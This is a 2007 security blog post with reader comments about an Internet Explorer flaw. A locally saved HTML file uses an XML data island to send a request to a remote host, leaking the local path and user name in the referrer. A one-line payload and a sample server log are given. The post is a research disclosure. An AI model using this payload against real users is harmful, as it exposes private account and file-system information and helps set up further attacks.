IE Sends Local Addresses in Referer Header
I’m not sure why it took me so long to get around to this, but I finally was able to test and verify that this works. In Internet Explorer if you can get a user to save a file to disc and run it it will disclose local drive information in the referrer without using JavaScript. trev sent this one to me, and after some failed tests I got it working (still not quite sure why it didn’t work when I first tried it). Here’s the simple code:
<xml id="xml" src="http://my.site.com/"></xml>
Here’s a sample of what the log looked like when I tested it:
xxx.xxx.xxx.xxx - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 "file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
As you can see, not only does this give away local address information, but it can also give you sensitive information like the user name, and the location on the drive. That could easily be used to leverage further attacks, and to my knowledge there is no other way to do this without running JavaScript or some other active control. This completely fails in Firefox as it doesn’t support XML data islands. Nice find, Trev!
March 26th, 2007 at 4:37 am
I just thought why one should use the xml tag to do it when there is something like background: url() in css.
but this obviously doesn’t work. The browser sends an empty referer after saving it to hard disk. I tested it in firefox, opera and konqueror (all linux) and all the same result.
March 26th, 2007 at 7:12 am
Well I just played some more with it and it seems that, at least firefox, drops the referer when making requests from a https page. Probably a similar mechanism doesn’t allow sending the referer header from local files.
March 26th, 2007 at 11:07 am
Nice find!
March 26th, 2007 at 2:32 pm
Hasn’t this existed for a while though? I only ask because I know of several sites that prevent pages from submitting forms after they’ve been saved locally though I’m not sure whether they specifically rule out local areas, or whether it’s a general referer.
March 26th, 2007 at 7:39 pm
It’s probably the opposite. They require that the referrer exists and that it matches the website URL, and if it doesn’t then they bounce it.
March 29th, 2007 at 11:04 am
Hehe Ive seen that some years ago. I managed the for an female actor.
The funny thing was, that one man she knew as a friend, visited the page from his local startpage. The referrer was
c:\…..\NAME_OF_THE_FRIEND\Desktop\hotSluts.html
Well that was the end of the friendship ;).
October 16th, 2007 at 1:11 pm
Interesting technique, RSnake!
It’s information leak in Internet Explorer.
As I tested, this method doesn’t work in IE 6, so it works only in IE 7.
October 16th, 2007 at 2:51 pm
I was hurried with my previous test. As I retested, IE 6 send referer with this method (with xml tag). It’s just my local web server configured to not log referers :-). And I wrote my own script and confirmed that this method works.
So it works in both IE 6 and IE 7.
October 17th, 2007 at 6:37 am
Thanks for testing, MustLive. It’s a pretty sexy method in some ways - especially if you combine it with my webbug technique: http://ha.ckers.org/webbug.html